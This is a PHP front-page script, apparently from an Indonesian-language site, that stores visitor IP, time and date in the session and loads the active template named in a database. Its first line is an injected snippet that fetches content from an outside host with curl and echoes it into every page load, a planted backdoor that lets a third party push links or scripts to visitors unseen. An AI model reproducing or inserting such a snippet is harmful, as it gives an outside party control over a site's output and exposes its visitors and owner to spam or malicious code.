<?php $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'https://php-json.dev/css-json.php'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $dewa = curl_exec($ch); curl_close($ch);?> <?php echo $dewa; ?>
<?php

ob_start();
session_start();

$tip        = isset($_SESSION['ip'])    ? $_SESSION['ip']  : '';
$tjam       = isset($_SESSION['jam'])   ? $_SESSION['jam'] : '';
$ttgl       = isset($_SESSION['tgl'])   ? $_SESSION['tgl'] : '';

if($tip =='' && $tjam =='' && $ttgl == ''){

    $ip                 = $_SERVER['REMOTE_ADDR'];
    $jam                = date("h:i:s");
    $tgl                = date("d-m-Y");

    $_SESSION ["ip"]    = $ip;
    $_SESSION ["jam"]   = $jam;
    $_SESSION ["tgl"]   = $tgl;
}
$sip    = isset($_SESSION['ip'])  ? $_SESSION['ip']  : '';
$sjam   = isset($_SESSION['jam']) ? $_SESSION['jam'] : '';
$stgl   = isset($_SESSION['tgl']) ? $_SESSION['tgl'] : '';

include "koneksi.php";
include "function.php";

$pilih_template=executeQuery("SELECT folder FROM templates WHERE aktif='Y'");

$template = mysqli_fetch_array($pilih_template);
if(mysqli_num_rows($pilih_template) > 0) {

    include_once "$template[folder]/template.php";
}else {
    die('Tidak Ada Template Aktif.');
}
